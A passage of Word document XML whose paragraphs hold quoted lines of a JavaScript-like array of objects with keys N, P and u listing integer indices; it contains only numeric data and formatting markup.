    <w:p w14:paraId="4B838276" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F30D451" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4DED08" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [222]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8B424B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387B10C9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643FCB2E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E628D95" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DE8038" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E9BE2E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1931E2C0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 7, 9, 11, 12, 13, 14],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D492C7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 3, 4, 5, 6, 8, 10, 21, 23, 91, 159, 311, 317, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0FAA84" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030D7C13" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375D8A84" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A97CAD7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4D5F44" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4C8047" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E2160F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3075175D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170E236E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1471E1DE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF2D03F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512BEF7B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [6, 19]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8F1F6C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B52EA1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCA9966" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6BBFC3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 6, 7, 10, 17, 20]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A87048" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E86F32" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FEA083" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6860A923" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 22, 33, 35]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F45A4F7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD67E3C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B589DA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67766A07" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CE75DE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8CB1FF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13955024" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62303A03" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 4, 77]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2E631F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619D9AE4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764BF5C4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2, 3, 4, 6, 7, 8, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B205158" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 5, 30, 35, 174, 238, 333, 341]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DD819A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C1A240" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047A38AA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDC79D8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2, 5, 11]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283B3421" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024B959B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B716F4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F8589A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6BBAC6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE92BED" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B46EF74" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5CEC23" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DBE0FF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5347CB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F5F037" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030D5409" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 9, 12, 193]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315DA008" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD126AD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C5AE89" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC5A8FE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [317, 320]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F0EF56" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1AB8FE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7237C0C3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEAE689" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [231]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519AEC9C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F740A84" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C44EBB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430D4189" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E980A4B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 25]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CFE42B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17712874" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B29B405" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EC0167" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFEA150" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7F4C30" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9A83E9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C35D81" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 2, 3, 4, 5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E7123B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB3185C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBA3A5E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 5, 6, 7, 8, 9, 10],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5E03C8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [1, 4, 18, 25, 89, 128]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC4157B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2678D30C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         g: 6,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04453227" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA1BDE2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2, 3, 4, 5, 7, 8, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FE7E62" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E437C65" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E082634" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AE67F2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D6543B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736A2071" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496B740E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A50284F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302735C4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B467C96" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A268546" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D38ECC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0919DCB6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4034F93A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B49FF00" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C884DB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579DA7F0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 35]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56408F0F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BD095F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401D2999" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D1B33D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD61123" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5C4DB8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1E7C2A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8E1585" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 11]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DC8D59" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002756E5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003D2E37" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4622AF1A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 16]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA4465C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282C080C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3D78EB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D54B0EE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2, 3, 4, 5, 12, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551460F8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D8E104" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603CFE8A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [7, 9, 10, 11, 14, 17, 18, 19, 22, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 40, 41, 42, 43, 44],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFDD4CB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2, 3, 4, 5, 6, 8, 12, 13, 15, 16, 20, 21, 23, 24, 25, 39, 126, 137, 159, 248, 281, 284, 301, 311, 317, 350, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD92F5D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FABE6E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 4,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56684BEA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A35348F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
